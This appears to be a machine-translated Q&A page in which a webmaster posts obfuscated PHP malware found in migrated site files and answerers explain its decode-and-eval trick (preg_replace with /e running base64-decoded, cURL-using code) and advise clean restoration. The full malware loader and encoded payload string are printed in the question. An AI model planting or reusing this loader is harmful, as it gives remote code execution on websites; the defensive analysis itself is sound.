Geek Answers Handbook

Malicious PHP Files Detected by Host

I do not know if it is right to ask this question, if it is not, please let me know.

I recently got a project to move a website from one host (I don’t know which one) to a new one (host agent). I did this, and within one day I received a message from the hosgent that the site was blocked because malicious files were detected on the server. They gave me a list of php files that contained "malware." I opened them, and, of course, there was something unusual. There was a huge hexadecimal string (hereinafter referred to as THE STRING ) assigned to a global variable and a more hidden gibberish below it.

I tried to understand the code, and what I understood is written in the comments

 <?php $I1ll=0;$GLOBALS['I1ll'] = ';!AY3VybAqbX2luaXQYWxsb3dfdXJsX2ZvcGVuJFlMQipVX3NldG9wdAU&=X2V4ZWMpxtXwGEXY2xvc2UxDFy&PGltZyBzcmM9Ig^ZIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4CHgoegSFRUUF9IT1NU%_MTI3LgNjbMTAuAgNMTkyLjE2OC4.gdwb}ub3Nvbi5pbgZ2Fib3Iuc2U.c2lsYmVyLmRlZDaGF2ZWFwb2tlLmNvbS5hdQ^PWV8&OgZGlzcGxheV9lcnJvcnMOkZGV0ZXJtaW5hdG9yZnRwDm Mi4xMgMroSUkxSTFsbGwxwU qYmFzZTY0X2RlY29kZQivkYmFzZTY0X2VuY29kZQeaHR0cDovLwFq}SFRUUF9VU0VSX0FHRU5UW*dW5pb 24_D.c2VsZWN0cyrUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUUVVFUllfU1RSSU5H@ _Pw(FL3RtcC8R.kjL3RtcAQVE1QhuVEVNUAkVE1QRElSaKuAdXBsb2FkX3RtcF9kaXIdLg~gdmVyc2lv$LQjLXBocA=kSFRUUF9FWEVDUEhQN;Ijjb3V0b2sH$!iRaHR0cAIOi8vii}L3BnLnBocD91PQ~XJms9mBJnQ9cGhwJnA9?nMJnY9Cd*?6261736536345f6465636f6465'; if (!function_exists('I111II11')){ //if function doesn't exist function I111II11($a, $b){ //define the function $c=$GLOBALS['I1ll']; //get hexadecimal value $d=pack('H*',substr($c, -26)); //pack data into binary string passing last 26 characters of THE STRING, translates to 'base64_decode' return $d(substr($c, $a, $b)); //base64_decode the required section of THE STRING } }; $Illl1I1l1 = I111II11(6482, 16); // wants to process 'cHJlZ19yZXBsYWNl' translates to 'preg_replace' $Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI"); // Replace 'IIIIll1lI' with '' ?>

So in the end, he uses the preg_replace function to replace the string, but from what this code seeks to achieve this, he did nothing with it, not even echo 'ed. Is processor time required? Does the /e modifier have anything to do with this?

Another thing I would like to mention is more code in files, regular codes. These are not junk files, these are website administrative files used to manage the site, such as adding or removing content, etc.

In addition, all files are not exactly the same; they have different lines and extract different parts of it in terms of character numbers.

Any idea what it is?

Edit : I found a similar question where the cleaned version is posted and explained in detail

+5
source share
3 answers
 $Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

translates to

 preg_replace("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

when it is important that /e I111II11(658, 5824) output of I111II11(658, 5824) as PHP code before replacing.

What I111II11(658, 5824) returns

 eval(base64_decode("aWYgKCFkZWZpbmVkK...bEkpOyB9IH0gfQ=="));

If you change eval to echo , you will see PHP executable code. I do not insert it here fully, but you can try to understand it if you want.

 if (!defined("determinator")) { function getfile($QOQOOO) { $I1llI1 = I111II11(3, 6); $I1I111 = $I1llI1.I111II11(11, 7); ...

The code has lines starting with CURLOPT_ in it, so it seems to have downloaded something.

+3
source

Once you have established that it is a hack (which is obvious in this case), there is not much mileage in an attempt to understand what the code does and how it does it. Your first responsibilities should be:

  • To restore the site in an unloaded state.
  • To find out how the hack occurred
  • Take measures to prevent recurrence.

First of all, I really hope that you have the original copy of the code before hacking. If this is custom-written code, then I hope you have the source code somewhere. If this is a third-party application, you can download it from the original suppliers. Do not try to recover it from hacked files; You can see obvious hacks, but there may be other less obvious things; you simply won’t know if you do not perform a full code audit.

Switching to a new host can help with C # 3, depending on the answer to # 2. You still do this to get started well.

On the other hand, if your original PHP application has vulnerabilities that were exploited, then no number of switching hosts will help; you really need to fix the code. For third-party applications, if the application is well supported, this can be achieved by updating to the latest version. For custom code, you need to find security flaws for yourself.

After you have completed all the work to protect the site, you have time to spend time analyzing the actual hacked code.

+3
source

Hi @VeeK. I watched the code, and there is a suspicious thing in this code - using preg_replace with the e modifier, which is dangerous and therefore deprecated in the latest versions of the php reason, as this can cause the execution of remote malicious codes. And, as the host user, I can say that the host server has authentication of all downloaded files, which obviously caught the logic of the code execution

For your links, these are the best resources of a security researcher:

Read here

+2
source

More articles:


All Articles